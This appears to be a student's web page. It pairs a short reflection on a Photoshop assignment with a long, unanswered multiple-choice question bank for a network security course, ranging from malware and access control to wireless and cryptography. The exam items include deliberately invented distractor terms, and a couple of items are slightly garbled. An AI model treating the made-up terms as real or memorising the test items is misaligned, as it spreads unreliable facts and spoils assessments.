GEM Adobe Photoshop CS5

In this Assignment 2, the greatest obstacle that I faced along the way would be deciding on the innovative idea of how to start a piece of digital art. By browsing some of the art work on internet, it provides me with the various ideas and inspirations. However, most of the ideas did not get me anywhere. For instance, taking a picture of an old classic camera is difficult, as it is extremely rare to find one of those these days.

While working on the pictures of the construction vehicles, I had personally made a trip down to a few construction sites to ask for permissions for photo taking. However, they do not allow me to enter any of the construction sites due to their safety rules. Therefore, I have decided to change my project and choose one of the robot figures which is well known as the “Mobile Suits” for my assigment. As a kid, I used to watch robot-related TV programmes such as the Transformers, Gundam and Astro boy. Collecting robot figures eventually became my favourite hobby as I developed a deep interest in them.

I have chosen this specific robot as my assignment because it holds a memorable value to me.  

This robot was a gift from my childhood frend who passed away 3 years ago as my 21^th birthday present with both of our names neatly craved on it. I really hope that i could do something on this assignment to make her proud. Despite the obstacles that i faced while working on this assignment, such as time constrains, I somehow managed to overcome all of them through putting in all of my effort.

As to summarise, what I have gained from this assignment are a vital part of our polytechnic education and also an important factor when we start a career in the future. Not only this assessment provide a strong basis for resolving everyday issues, it also undoubtedly helps to handle situations with a positive approach. Any type of work in any industry in any nation has its own type of projects or assignments, so it is important for us to get ready and be prepared for any future challenges that awaits us.

---

distinction!!  thank a lot.. my childhood friend (Ying hong)

ET0522 NETWORK SECURITY SYSTEMS

Security Guide Network Security Fumdamentals

Chapter 1


(Note: there are total 400 question for the final exam which there are 200 provided over here as i do not have the enough time to upload all of them.) <50% of the question will come out during exam>
Additional 200 question i will send to your email account< another 50% will come out over here, total make up 100%>. sorry for any inconvenience cause.

1. Each of the following is a reason why it is difficult to defend against today’s attackers except _____________ .

A. speed of attacks
B. greater sophistication of attacks
C. complexity of attack tools
D. delays in patching hardware and work software products

2. A(n) _____ attack takes advantage of vulnerabilities that have not been previously revealed.

A. zero day
B. quick vulnerability assessment (QVA)
C. glamour
D. signature-based attack

3. _____ ensures that only authorized parties can view the information.

A. Availability
B. Integrity
C. Confidentiality
D. ICA

4. Each of the following is a successive layer in which information security is achieved except _________________.

A. products
B. people
C. procedures
D. Intrusion Wormhole Defense (IWD)

5. A(n) _____ is a person or thing that has the power to carry out a threat.

A. vulnerability
B. threat agent
C. exploit
D. risk factor

6. Each of the following is a goal of information security except __________.

A. Prevent data theft
B. Decrease user productivity
C. Avoid legal consequences
D. Foil cyberterrorism

7. The _____ requires that enterprises must guard protected health information and implement policies and procedures to safeguard it.

A. Health Insurance Portability and Accountability Act (HIPAA)
B. Sarbanes-Oxley Act (Sarbox)
C. Gramm-Leach-Bliley Act (GLBA)
D. Hospital Protection and Insurance Association Agreement (HPIAA)

8. Utility companies, telecommunications, and financial services are considered prime targets of _____ because attackers can significantly disrupt business and personal activities by destroying a few targets.

A. cyberterrorists
B. kiddie scripters
C. computer spies
D. blue hat hackers (BHH)

9. After an attacker probed a computer or network for information she would next ________.

A. modify security settings
B. penetrate any defenses
C. paralyze networks and devices
D. circulate to other systems

10. An organization that purchased security products from different vendors in case an attacker circumvented the Brand A device, yet would have more difficulty trying to break through a Brand B device because they are different, is an example of ________.

A. obscurity
B. layering
C. limiting
D. diversity

11. _____ is a superset of information security and includes security issues that do not involve computers.

A. Google reconnaissance
B. Risk security (RS)
C. Information assurance (IA)
D. Asset restriction (AR)

12. _____ attacks come from multiple sources instead of a single source.

A. Distributed
B. Isolated
C. Script resource malware (SRM)
D. Form resource

13. _____ are a loose-knit network of attackers, identity thieves, and financial fraudsters.

A. Cybercriminals
B. Hackers
C. Spies
D. Script kiddies

14. Each of the following is a characteristic of cybercriminals except ________.

A. low motivation
B. less risk-averse
C. better funded
D. more tenacious

15. Each of the following is a characteristic of cybercrime except ________.

A. targeted attacks against financial networks
B. unauthorized access to information
C. theft of personal information
D. exclusive use of worms and viruses

16. An example of a(n) _____ is a software defect in an operating system that allows an unauthorized user to gain access to a computer without a password

A. vulnerability
B. threat
C. threat agent
D. asset exploit (AE)

17. _____ requires banks and financial institutions to alert customers of their policies and practices in disclosing customer information and to protect all electronic and paper containing personally identifiable financial information.

A. California Savings and Loan Security Act (CS&LSA)
B. USA Patriot Act
C. Sarbanes-Oxley Act (Sarbox)
D. Gramm-Leach-Bliley Act (GLBA)

18. The term _____ is commonly used in a generic sense to identify anyone who illegally breaks into a computer system.

A. hacker
B. cyberterrorist
C. Internet Exploiter
D. cyberrogue

19. An example of _____would be not revealing the type of computer, operating system, software, and network connection a computer uses.

A. diversity
B. limiting
C. obscurity
D. layering

20. The _____ is primarily responsible for assessment, management, and implementation of security.

A. Chief Information Security Officer (CISO)
B. security manager
C. security administrator
D. security technician


Chapter 2

1. A(n) _____ is a program that secretly attaches itself to a carrier such as a document or program and then executes when that document is opened or program is launched.

A. virus
B. worm
C. rootkit
D. Trojan

2. The first action that a virus takes once it infects a computer is to

A. close all ports
B. erase the payload
C. authenticate
D. replicate

3. Each of the following is a different type of computer virus except

A. file infector virus
B. remote virus
C. resident virus
D. boot virus

4. A computer program that pretends to clean up a hard drive but actually performs a malicious activity is known as a(n)

A. Trojan
B. rootkit
C. worm
D. logic bomb

5. To remove a rootkit from a computer you should

A. erase all files in the WINNT folder
B. expand the Master Boot Record
C. reformat the hard drive and reinstall the operating system
D. flash the ROM BIOS

6. Each of the following could be a logic bomb except

A. Erase all data if John Smith’s name is removed from the list of employees
B. Reformat the hard drive three months after Susan Jones left the company
C. Send spam to all employees
D. If the company’s stock price drops below $10 then credit Jeff Brown with ten additional years of retirement credit

7. _____ is a technique used by spammers to horizontally separate words so they are not trapped by a filter yet can still be read by the human eye.

A. Word splitting
B. Word layering
C. Parsing
D. Speckling

8. _____ is an image spam that is divided into multiple images and each piece of the message is divided and then layered to create a complete and legible message.

A. GIF layering
B. word splitting
C. geometric variance
D. split painting

9. _____ is a general term used for describing software that violates a user’s personal security.

A. Spamware
B. Warezware
C. Adaware
D. Spyware

10. A(n) _____ is either a small hardware device or a program that monitors each keystroke a user types on the computer's keyboard.

A. keylogger
B. macro
C. script kiddie
D. port replicator

11. Attackers use _____ to remotely control zombies.

A. Google
B. e-mail
C. spam
D. Internet Relay Chat (IRC)

12. On modern computer systems the BIOS is stored on a _____ chip

A. Silver flash
B. Basic Output/Input
C. Programmable Read Only Memory (PROM)
D. Read Only Memory (ROM)

13. Each of the following is an advantage of a USB device except

A. slower speed
B. nonvolatile
C. better shock resistance
D. tolerates temperature extremes

14. _____ is a single, dedicated hard disk-based file storage device that provides centralized and consolidated disk storage that is available to users through a standard network connection.

A. Storage Area Network (SAN)
B. Network Attached Storage (NAS)
C. Attached Device Repository (ADR)
D. Network Data Pool (NDP)

15. Each of the following is an attack that can be used against cell phones except

A. Lure users to malicious websites
B. Infect the cell phone with malware
C. Attack other cell phone users
D. Turn off the cell phone

16. The ability to move a virtual machine from one physical computer to another with no impact on users is called ____.

A. server balancing
B. VLAN segmentation
C. hypervisor storage
D. live migration

17. The _____ is the software that runs on a physical computer and manages multiple virtual machine operating systems.

A. virtual resource allocator (VRA)
B. hypervisor
C. Microsoft Control Plug-in
D. hardware allocator

18. _____ is exploiting a vulnerability in the software to gain access to resources that the user would normally be restricted from obtaining.

A. Vulnerability assessment
B. Software threat release (STR)
C. Hardware virus
D. Privilege escalation

19. Each of the following is the reason why adware is scorned except

A. It displays objectionable content
B. It can cause a computer to crash or slowdown
C. It can interfere with a user’s productivity
D. It displays the attackers programming skills

20. An attacker who controls multiple zombies in a botnet is known as a(n)

A. Bot herder
B. Zombie shepherd
C. Rogue IRC
D. Cyber-Robot

Chapter 3

1. A(n) _____ is a general software security update intended to cover vulnerabilities that have been discovered.

A. service pack
B. hotfix
C. patch
D. critical update

2. Each of the following is an advantage of an automated patch update service except

A. Users can download the patch immediately when it is released
B. Bandwidth can be saved because each computer does not have to connect to an external server
C. Reports can be obtained regarding what updates each system needs
D. Users cannot circumvent updates

3. Attackers use buffer overflows to

A. point to another area in data memory that contains the attacker’s malware code
B. corrupt the kernel so the computer cannot reboot
C. place a virus into the kernel
D. erase buffer overflow signature files

4. The Windows application _____ will not allow code in the memory area to be executed.

A. Dynamic Memory Expansion Restriction (DMER)
B. Buffer Overflow Prevention (BOP)
C. Execute Bit (EXB)
D. Data Execution Prevention (DEP)

5. Each of the following is a step that most security organizations take to configure operating system protection except

A. Develop a security policy
B. Create configuration baselines
C. Create security templates
D. Deploy nX randomization

6. A cookie that was not created by the Web site that attempts to access it is called a(n)

A. first-party cookie
B. second-party cookie
C. third-party cookie
D. fourth-party cookie

7. _____ resides inside an HTML document

A. ActiveX
B. JavaScript
C. Java
D. Virtual Machine (VM)

8. A Java applet _____ is a barrier that surrounds the applet to keep it away from resources on the local computer.

A. fence
B. sandbox
C. playpen
D. Java Container Closed Object (JCCO)

9. Address Space Layout Randomization (ASLR) randomly assigns _____ to one of several possible locations in memory.

A. executable operating system code
B. xN bits
C. DEP
D. sockets

10. The TCP/IP protocol _____ handles outgoing mail.

A. Post Office Protocol (POP)
B. Simple Mail Transfer Protocol (SMTP)
C. IMAP4
D. Microsoft Mail Transport (MMT)

11. Instant Messaging (IM) connects two systems

A. through the IM server
B. directly without using a server
C. only in a remote chat session
D. using Internet Relay Chat (IRC)

12. With a(n) _____ network users do not search for a file but download advertised files.

A. BitTorrent
B. P2P
C. swarm
D. RCIP

13. Another name for antivirus definition files is

A. signature files
B. virus resource entities (VRE)
C. AV patches
D. SigDef

14. The preferred location for an spam filter is

A. on the SMTP server
B. on the POP3 server
C. integrated into the network firewall
D. on the DHCP client

15. A(n) _____ is a list of pre-approved e-mail addresses that the user will accept mail from.

A. blacklist
B. client access account (CAA)
C. whitelist
D. POP3 transfer list

16. Another name for a packet filter is a(n)

A. firewall
B. HIDS
C. SQL eliminator
D. SIDS

17. A(n) _____ works on the principle of comparing new behavior against normal behavior.

A. Host Intrusion Detection System (HIDS)
B. packet filter
C. Internet Resource Chat (IRC)
D. personal software firewall

18. A(n) _____ is a cumulative package of all security updates plus additional features.

A. service pack
B. update
C. update rollup
D. hotfix patch

19. A(n) _____ is a method to configure a suite of configuration baseline security settings.

A. security template
B. group policy
C. snap-out
D. Active Directory Planner

20. A(n) _____ is a program that does not come from a trusted source.

A. ActiveX Controller Entity
B. signed JavaScript application
C. JavaScript applet
D. unsigned Java applet

Chapter 4

1. A network tap____________________.

A. has been made obsolete by software protocol analyzers
B. is a separate device that can be installed between other network devices to monitor traffic
C. stands for “Technology Account Protocol” (TAP)
D. is the same as a wireless access point

2. Each of the following is a characteristic of a weak password except_________.

A. Using a common dictionary word
B. Using personally identifiable information
C. A password that is long
D. Recording the password on paper

3. A(n) _____ is an account on a device that is created automatically to aid in installation and should be deleted once that is completed.

A. default account
B. back door
C. User Installation Account (UIA)
D. privilege account

4. A(n) _____ attack attempts to consume network resources so that the devices cannot respond to legitimate requests.

A. system overflow
B. Denial of service
C. reverse ping
D. ARP spoofing

5. Wireless denial of service attacks are successful because wireless LANs use the protocol____________.

A. Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA)
B. Carrier Sense Multiple Access with Collision Detection (CSMA/CD)
C. time slot allocation (TSA)
D. implicit ACK frame acknowledgment protocol (IAFAP)

6. A man-in-the-middle attack_________________.

A. can be defeated by using the TCP/IP protocol
B. intercepts legitimate communication and forges a fictitious response
C. is only found on a wireless network
D. are always passive

7. The difference between a replay attack and a man-in-the-middle attack is________.

A. Replay attacks are always faster
B. A replay attack makes a copy of the transmission before sending it to the recipient
C. A man-in-the-middle attack can be prevented yet a replay attack cannot
D. Replay attacks are no longer used today

8. An example of an antiquated protocol that has been replaced by a more secure version is______________.

A. Simple Network Management Protocol (SNMP) Version 2
B. Address Resolution Protocol
C. Internet Protocol
D. ARPA

9. Where does the TCP/IP host table name system for a local device store a symbolic name to Internet Protocol address mappings?

A. On the Domain Name System (DNS) server
B. In a local hosts file
C. In the ARP cache
D. On a network file server

10. Attackers take advantage of Domain Name System _____ to send fraudulent DNS entries.

A. area requests
B. domain resource sharing (DRS)
C. Internet name system transfer protocol
D. zone transfers

11. A more secure version of the Berkeley Internet Name Domain software is______.

A. Total Secure Domain Name System Zone (TSDNSZ)
B. Secure BIND
C. MX Secure (MXS)
D. DNSSEC

12. _____ is used for Ethernet local area networks to resolve Internet Protocol addresses.

A. ARP
B. P2P
C. CCSIP
D. I4PR

13. An attack that takes advantage of the order of arrival of TCP packets is_______.

A. IP forwarding
B. FTP spoofing
C. IP resolution
D. TCP/IP hijacking

14. War driving exploits _____, which is the wireless access point sending out information about its presence and configuration settings.

A. scanning
B. beaconing
C. location frame stamping
D. SGP mapping

15. A group of Bluetooth piconets in which connections exist between different piconets is called a(n)__________.

A. scatternet
B. OPNET
C. double piconet (DP)
D. slavenet

16. _____ is the unauthorized access of information from a wireless device through a Bluetooth connection.

A. Blue jacking
B. Bluetooth snatching
C. Bluetooth spoofing
D. Blue snarfing

17. In a(n) _____ attack the attacker overflows a switch’s address table with fake media access control (MAC) addresses and makes the switch act like a hub, sending packets to all devices.

A. switch flooding
B. MAC ARP impersonation
C. Address Domain Resolution (ADR)
D. switch advertisement

18. A back door can be created by each of the following except______________.

A. a programmer of the software on the device
B. a virus
C. spam
D. a Trojan horse

19. Using _____, an attacker attempts to gather information to map the entire internal network of the organization supporting the DNS server.

A. DNS transfer
B. DNS spoofing
C. Zone transfer imaging (ZTI)
D. Name resolution spoofing

20. Each of the following could be the result of an ARP poisoning attack except________.

A. Change entries in a DNS zone transfer table
B. Steal data intended for another device
C. Force a switch to revert to a hub
D. Prevent Internet access to users on a network

Chapter 5

1. Subnetting ____________________.

A. splits the network IP address on the boundaries between bytes
B. is also called subnet addressing
C. provides very limited security protection
D. requires the use of a Class C network

2. A virtual LAN (VLAN) allows devices to be grouped _____________.

A. logically
B. based on subnets
C. only around core switches
D. directly to routers

3. Convergence combines voice, data, and video traffic ____________.

A. over a single IP network
B. through hubs
C. one stream at a time
D. only on wireless networks

4. Each of the following is a convergence security vulnerability except __________.

A. convergence resource attacks (CRA)
B. VoIP protocols
C. spam
D. lack of encryption

5. Which of the following is not true regarding a demilitarized zone (DMZ)?

A. It contains servers that are only used by internal network users
B. It typically has an e-mail or Web server
C. It can be configured to have one or two firewalls
D. provides an extra degree of security

6. Network address translation (NAT) _________________.

A. substitutes MAC addresses for IP addresses
B. can only be found on core routers
C. removes private addresses when the packet leaves the network
D. can be stateful or stateless

7. Each of the following is a variation available in network access control (NAC) implementations except ____________.

A. Client or clientless
B. Switch, inline, or out-of-band
C. Network or local
D. Pre-connect or post-connect

8. Another name for a packet filter is a(n) __________________.

A. DMZ
B. firewall
C. proxy server
D. honeypot

9. The _____ establishes the action that a firewall takes on a packet.

A. host cache
B. rule base
C. syntax table
D. packet outline

10. A(n) _____ intercepts internal user requests and then processes that request on behalf of the user.

A. proxy server
B. content filter
C. intrusion prevention device
D. host detection server

11. A reverse proxy _________________.

A. is the same as a proxy server
B. routes incoming requests to the correct server
C. must be used together with a firewall
D. only handles outgoing requests

12. A honeypot is used for each of the following except ____________.

A. Deflect attention away from real servers
B. Filter packets before they reach the network
C. Provide early warning of new attacks
D. Examine attacker techniques

13. A(n) _____ watches for attacks but only takes limited action when one occurs.

A. network intrusion detection system (NIDS)
B. network intrusion prevention system (NIPS)
C. proxy intrusion device
D. firewall

14. A multipurpose security appliance integrated into a router is known as a(n) _______.

A. unified attack management system (UAMS)
B. integrated network security hardware device
C. intrusion detection/prevention device
D. proxy security system (PSS)

15. Each of the following can be used to hide information about the internal network except ___________.

A. Network address translation (NAT)
B. Proxy server
C. subnetting
D. protocol analyzer

16. The difference between a network intrusion detection system (NIDS) and a network intrusion prevention system (NIPS) is ___________.

A. A NIDS provides more valuable information about attacks
B. A NIPS is much slower because it uses protocol analysis
C. A NIPS can take extended actions to combat the attack
D. There is no difference because a NIDS and a NIPS are equal

17. A variation of NAT that is commonly found on home routers is _______.

A. Network address IP transformation (NAIPT)
B. Port address translation (PAT)
C. Network proxy translation (NPT)
D. Subnet transformation (ST)

18. If a device is determined to have an out-of-date virus signature file then Network Access Control (NAC) can redirect that device to a network by _______.

A. Address Resolution Protocol (ARP) poisoning
B. TCP/IP hijacking
C. DHCP man-in-the-middle
D. a Trojan horse

19. Each of the following is an option in a firewall rule base except _______.

A. delay
B. prompt
C. block
D. allow

20. A firewall using _____ is the most secure type of firewall.

A. stateful packet filtering
B. network intrusion detection system replay
C. reverse proxy analysis
D. stateless packet filtering

Chapter 6

1. The amendment to add 5.5 Mbps and 11 Mbps to the IEEE 802.11 standard is ______.

A. IEEE 802.11a
B. IEEE 802.11b
C. IEEE 802.11g
D. IEEE 802.11n

2. Access to the wireless network can be restricted by _______.

A. MAC address filtering
B. ARP resolution
C. TKIP encryption
D. WEP authentication

3. The cyclic redundancy check (CRC) is also called the _______.

A. integrity check value (ICV)
B. initialized vector resource (IVR)
C. check parity bit (CPB)
D. R5C check

4. A wireless network requires that the _____ be authenticated first.

A. user
B. thick wireless device
C. wireless device
D. authentication probe

5. The Service Set Identifier (SSID) _____.

A. serves as the network name for a WLAN
B. is only used on IEEE 802.11g networks
C. is optional on all networks
D. is used only with closed system authentication

6. The optional authentication method that forces the wireless device to encrypt challenge text using its WEP encryption key is known as _____ .

A. WEP encryption
B. shared key authentication
C. challenge text verification (CTV)
D. AP authentication (APA)

7. Each of the following is a weakness of open system authentication except _______.

A. SSIDs are by default contained in beacon frames to all wireless devices
B. turning off SSIDs can hinder roaming
C. SSIDs are transmitted in other management frames sent by the access point
D. open system authentication requires an authentication server

8. The weakness of WEP is that _____.

A. it requires the use of an enhanced access point (EAP) for it to function properly
B. it is costly to implement
C. the encryption algorithm has been broken by attackers
D. the initialization vectors (IVs) are repeated

9. The two models for personal wireless security developed by the Wi-Fi Alliance are Wi-Fi Protected Access (WPA) and _____ .

A. Protected Wireless Security (WPS)
B. IEEE 802.11x
C. Postshared Key Protection (PKP)
D. Wi-Fi Protected Access 2 (WPA2)

10. The _____ replaces the cyclic redundancy check (CRC) and is designed to prevent an attacker from capturing, altering, and resending a data packet.

A. Message Integrity Check (MIC)
B. Cyclic Redundancy Check 2 (CRC2)
C. Wi-Fi CRC
D. Wireless Parity Check (WPC)

11. The IEEE standard for wireless security is known as _____ .

A. IEEE 803.x
B. IEEE Wi-Fi Protected Access
C. IEEE 802.11i
D. IEEE PSK

12. A(n) _____ is designed to verify the authentication of wireless devices using IEEE 802.1x.

A. proxy ID server
B. access point server
C. check point server
D. authentication server

13. Wireless switches are used in conjunction with _____ for increased security by moving security features to the switch.

A. authentication access points (AAPs)
B. network intrusion prevention system (NIPS)
C. access control appliances (ACA)
D. thin access points

14. Separate _____ can be used to support low-security guest Internet access and high-security administrators on the same access point.

A. wireless virtual local area networks (VLANs)
B. segmented access points
C. separated wireless streams (SWS)
D. proxy security servers

15. Each of the following can be used to monitor airwaves for traffic except a(n) _____.

A. dedicated probe
B. access point probe
C. resource monitor probe
D. wireless device probe

16. A WEP key that is 128 bits in length _____ .

A. has an initialization vector (IV) that is the same length as a WEP key of 64 bits
B. is less secure than a WEP key of 64 bits because shorter keys are better
C. cannot be cracked because it is too long
D. cannot be used on access points that use passphrases

17. For a SOHO the best security model would be the _____

A. Wi-Fi Protected Access Personal Security model
B. Enterprise Protection Personal Security model
C. IEEE Wi-Fi Personal Protection model
D. Wi-Fi Protected Access 2 Personal Security model

18. Preshared key (PSK) authentication requires that the encryption key _____.

A. must be entered on all devices prior to wireless communication occurring
B. be the same length as the Initialization Vector (IV)
C. be entered in hexadecimal notation on the access point
D. be encrypted before it can be entered by a user on a wireless device

19. _____ stores information from a device on the network so if a user roams away from a wireless access point and later returns, he does not need to re-enter all of the credentials.

A. Key-caching
B. Pre-key authentication
C. Key roaming
D. Security key resolution

20. The _____ model is designed for medium to large-size organizations in which an authentication server is available.

A. IEEE 802.11d
B. Wi-Fi Academic
C. WPA 2 Enterprise Security
D. Wi-Fi 802.x

Chapter 7

1. A user entering her username would correspond to the _____ action in access control.

A. identification
B. authentication
C. authorization
D. access

2. Access control can be accomplished by each of the following except ______.

A. resource management
B. hardware
C. software
D. policy

3. A process functioning on behalf of the user that attempts to access a file is known as a(n) _______.

A. object
B. subject
C. resource
D. operation check

4. The individual who periodically reviews security settings and maintains records of access by users is called the _____.

A. owner
B. custodian
C. manager
D. supervisor

5. In the _____ model, the end user cannot change any security settings.

A. Discretionary Access Control
B. Mandatory Access Control
C. Security Access Control
D. Restricted Access Control

6. Rule Based Access Control _____.

A. dynamically assigns roles to subjects based on rules
B. is considered a real-world approach by linking a user’s job function with security
C. requires that a custodian set all rules
D. is considered obsolete today

7. Separation of duties requires that _____.

A. end users cannot set security for themselves
B. managers must monitor owners for security purposes
C. processes should be divided between two or more individuals
D. jobs be rotated among different individuals

8. _____ in access control means that if a condition is not explicitly met then it is to be rejected.

A. Implicit deny
B. Explicit rejection
C. Denial of duties
D. Prevention control

9. A(n) _____ is a set of permissions that is attached to an object.

A. Subject Access Entity (SAE)
B. object modifier
C. access control list (ACL)
D. security entry designator

10. _____ is a Microsoft Windows feature that provides centralized management and configuration of computers and remote users who are using Active Directory.

A. Windows Register Settings
B. Resource Allocation Entities
C. AD Management Services (ADMS)
D. Group Policy

11. Which of the following is NOT a characteristic of a brute force attack?

A. They are faster than dictionary attacks.
B. They are generally not feasible.
C. They can take a long time to be successful.
D. Each attempt must be entered into the login program to determine if it is correct.

12. _____ create a large pre-generated data set of hashes from nearly every possible password combination.

A. LM hashes
B. NTLM databases
C. Dictionary tables
D. Rainbow tables

13. Which of the following is NOT a password policy defense against an attacker stealing a Windows password file?

A. Password-protect the ROM BIOS.
B. Physically lock the computer case so that it cannot be opened.
C. Disable all necessary accounts.
D. Ensure that all servers and computers are regularly patched.

14. The Domain password policy _____ determines the number of unique new passwords a user must use before an old password can be reused.

A. Maximum password time
B. Minimum password expiration
C. Set password reuse
D. Enforce password history

15. A(n) _____ extends a solid metal bar into the door frame for extra security.

A. preset lock
B. key-in-knob lock
C. tab lock
D. deadbolt lock

16. A(n) _____ uses buttons that must be pushed in the proper sequence to open the door.

A. keyboard lock
B. user bolt lock (UBL)
C. pad lock
D. cipher lock

17. An ID badge fitted with _____ makes it unnecessary to swipe or scan the badge for entry.

A. radio frequency (RFID) tags
B. electromagnetic sentry buttons
C. cipher scans
D. passive cores

18. Using video cameras to transmit a signal to a specific and limited set of receivers is called _____.

A. security monitoring transmission (SMT)
B. vector security (VS)
C. closed circuit television (CCTV)
D. restricted access television

19. The least restrictive access control model is _____.

A. Mandatory Access Control (MAC)
B. Discretionary Access Control (DAC)
C. Role Based Access Control (RBAC)
D. Rule Based Access Control (RBAC)

20. The principle known as _____ in access control means that each user should only be given the minimal amount of privileges necessary for that person to perform their job function.

A. least privilege
B. deny all
C. Enterprise Security
D. Mandatory Limitations

Chapter 8

1. Determining what a user did on a system is called _____.

A. identification
B. authentication
C. authorization
D. accounting

2. Which of the following is NOT an authentication method?

A. what a user knows
B. what a user has
C. what a user discovers
D. what a user is

3. One-time passwords that utilize a token with an algorithm and synchronized time setting is known as a(n) __________.

A. time-signature OTP
B. challenge-based OTP
C. time-synchronized OTP
D. token OTP

4. Which of the following is a difference between a time-synchronized OTP and a challenge-based OTP?

A. Only time-synchronized OTPs use tokens.
B. The user must enter the challenge into the token with a challenge-based OTP.
C. Challenge-based OTPs use authentication servers while time-synchronized OTPs do not.
D. Time-synchronized OTPs cannot be used with Web accounts while challenge-based OTPs can.

5. Keystroke dynamics is an example of what type of biometrics?

A. behavioral biometrics
B. cognitive biometrics
C. adaptive biometrics
D. resource biometrics

6. Creating a pattern of when and from where a user accesses a remote Web account is an example of ________.

A. computer footprinting
B. Time-Location Resource Monitoring (TLRM)
C. cognitive biometrics
D. keystroke dynamics

7. _____ is a decentralized open source FIM that does not require specific software to be installed on the desktop.

A. Windows CardSpace
B. OpenID
C. Windows Live ID
D. .NET Login

8. A RADIUS authentication server requires that the _____ must be authenticated first.

A. supplicant
B. authenticator
C. authentication server
D. user

9. Each of the following make up the AAA elements in network security except _______.

A. determining user need (analyzing)
B. controlling access to network resources (authentication)
C. enforcing security policies (authorization)
D. auditing usage (accounting)

10. Each of the following human characteristics can be used for biometric identification except _______.

A. weight
B. fingerprint
C. retina
D. face

11. _____ biometrics is related to the perception, thought processes, and understanding of the user.

A. Behavioral
B. Standard
C. Cognitive
D. Intelligence

12. Using one authentication to access multiple accounts or applications is known as _______.

A. credentialization
B. identification authentication
C. federal login
D. single sign-on

13. With the development of IEEE 802.1x port security, the authentication server _____ has seen even greater usage.

A. DAP
B. RADIUS
C. AAA
D. RDAP

14. A(n) _____ makes a request to join the network.

A. authenticator
B. Resource Allocation Entity (RAE)
C. applicant
D. supplicant

15. _____ is an authentication protocol available as a free download and runs on Microsoft Windows Vista, Windows Server 2008, Apple Mac OS X, and Linux.

A. IEEE 802.1x
B. RADIUS
C. Kerberos
D. LDAP

16. The version of the X.500 standard that runs on a personal computer over TCP/IP is_____.

A. DAP
B. LDAP
C. IEEE X.501
D. Lite RDAP

17. The management protocol of IEEE 802.1x that governs the interaction between the system, authenticator, and RADIUS server is known as _____.

A. RADIUS Server Protocol
B. Authentication Protocol
C. Transmission Control Protocol (TCP)
D. Extensible Authentication Protocol (EAP)

18. Which of the following protocols is the strongest?

A. EAP with Transport Layer Security (EAP-TLS)
B. Password Authentication Protocol (PAP)
C. Challenge-Handshake Authentication Protocol (CHAP)
D. Microsoft Challenge-Handshake Authentication Protocol (MS-CHAP)

19. A user-to-LAN virtual private network connection used by remote users is called a(n) _____.

A. site-to-site VPN
B. remote –access VPN
C. endpoint VPN
D. concentration VPN

20. Endpoints that provide _____ capability require that a separate VPN client application be installed on each device that connects to a VPN server.

A. built-in VPN
B. transparent endpoint VPN
C. pass-through VPN
D. concentration VPN

Chapter 11



1. The areas of a file in which steganography can hide data including all of the following
except __________.


A. in data that is used to describe the content or structure of the actual data
B. in the file header fields that describe the file
C. in areas that contain the content data itself
D. in the directory structure of the file system

2. Data that is to be encrypted by inputting into an algorithm is called __________.

A. clear text
B. open text
C. ciphertext
D. plaintext


3. Each of the following is a basic security protection over information that cryptography
can provide except __________.

A. confidentiality
B. stop loss
C. integrity
D. authenticity


4. Proving that a user sent an e-mail message is known as __________.

A. non-repudiation
B. reverse confidentiality
C. integrity
D. availability

5. A(n) __________ is never intended to be decrypted but is only used for comparison purposes.

a. plaintext
b. algorithm
c. key
d. digest

6. Each of the following is an example of how hashing is used except __________.

a. bank automatic teller machine (ATM)
b. verifying a user password entered on a Linux system
c. determining the integrity of a message
d. encrypting and decrypting e-mail attachments

7. Which of the following is NOT a characteristic of a secure hash algorithm?
a. The results of a hash function should not be reversed.
b. The hash should always be the same fixed size.
c. A message cannot be produced from a predefined hash.
d. Collisions should be rare.

8. The data added to a section of text when using the Message Digest (MD) algorithm is
called __________.
a. filler
b. extender
c. padding
d. byte extensions

9. Which of the following is a protection provided by hashing?
a. confidentiality
b. integrity
c. availability
d. authenticity

10. Symmetric cryptographic algorithms are also called __________.
a. cipherkey cryptography
b. public/private key cryptography
c. public key cryptography
d. private key cryptography

11. Monoalphabetic substitution ciphers and homoalphabetic substitution ciphers are examples
of __________.
a. symmetric stream ciphers
b. generic block ciphers
c. asymmetric block ciphers
d. hash ciphers

12. Which of the following is the strongest symmetric cryptographic algorithm?
a. Data Encryption Standard
b. Triple Data Encryption Standard
c. Advanced Encryption Standard
d. Rivest Cipher (RC) 1

13. When Bob wants to send a secure message to Alice using an asymmetric cryptographic
algorithm, which key does he use to encrypt the message?
a. Bob’s public key
b. Alice’s public key
c. Bob’s private key
d. Alice’s private key

14. A digital signature can provide each of the following benefits except __________.
a. verify the receiver
b. verify the sender
c. enforce non-repudiation
d. prove the integrity of the message

15. Which of the following asymmetric cryptographic algorithms is the most secure?
a. RSA
b. MD-17
c. SHA-2
d. ERFGA

16. __________ uses the Windows NTFS file system to automatically encrypt all files.
a. Encrypting File System (EFS)
b. GNU PGP
c. IDEA
d. MD-1

17. The Microsoft Windows BitLocker whole disk encryption cryptography technology can
protect each of the following except __________.
a. Windows system files
b. user files
c. temporary files
d. domain name system files

18. The Trusted Platform Module (TPM) __________.
a. is only available on Windows computers running BitLocker
b. includes a pseudorandom number generator (PRNG)
c. provides cryptographic services in hardware instead of software
d. allows the user to boot a corrupted disk and repair it

19. Most security experts recommend that __________ be replaced with a more secure algorithm.
a. DES
b. RSA
c. AES-256
d. MD-17

20. The Microsoft Windows LAN Manager hash __________.
a. is part of BitLocker
b. is required to be present when using TPM
c. is weaker than NTLMv2
d. is the same as MD-5
e. behavior-based monitoring

Chapter 12

1. The strongest technology that would assure Alice that Bob is the sender of a message is
a(n) __________.
a. digital signature
b. digital certificate
c. hash
d. encrypted signature

2. A digital certificate associates __________.
a. the user’s identity with their public key
b. a user’s private key with the public key
c. a digital signature with a user
d. a private key with a digital signature

3. An entity that issues digital certificates for others is a __________.
a. Certificate Authority (CA)
b. Signature Authority (SA)
c. Digital Signer (DS)
d. Certificate Signatory (CS)

4. A list of approved digital certificates is called a(n) __________.
a. Digital Certificate Authorization Form (DCAF)
b. Certificate Repository (CR)
c. Authorized Digital Signature
d. Digital Signature Permitted Authorization (DSPA)

5. Digital certificates can be used for each of the following except __________.
a. Verify the identity of clients and servers on the Web
b. Encrypt messages for secure e-mail communications
c. Verify the authenticity of the Registration Authorizer
d. Encrypt channels to provide secure communication between clients and servers

6. In order to ensure a secure cryptographic connection between a Web browser and a Web
server a __________ digital certificate would be used.
a. personal digital certificate
b. Web digital certificate
c. personal Web certificate determining the integrity of a message
d. server digital certificate

7. A digital certificate that turns the address bar green is a(n) __________.
a. Extended Validation SSL Certificate
b. Web Server Advanced Certificate
c. Personal Web-Client Certificate
d. Internet Standard Certificate

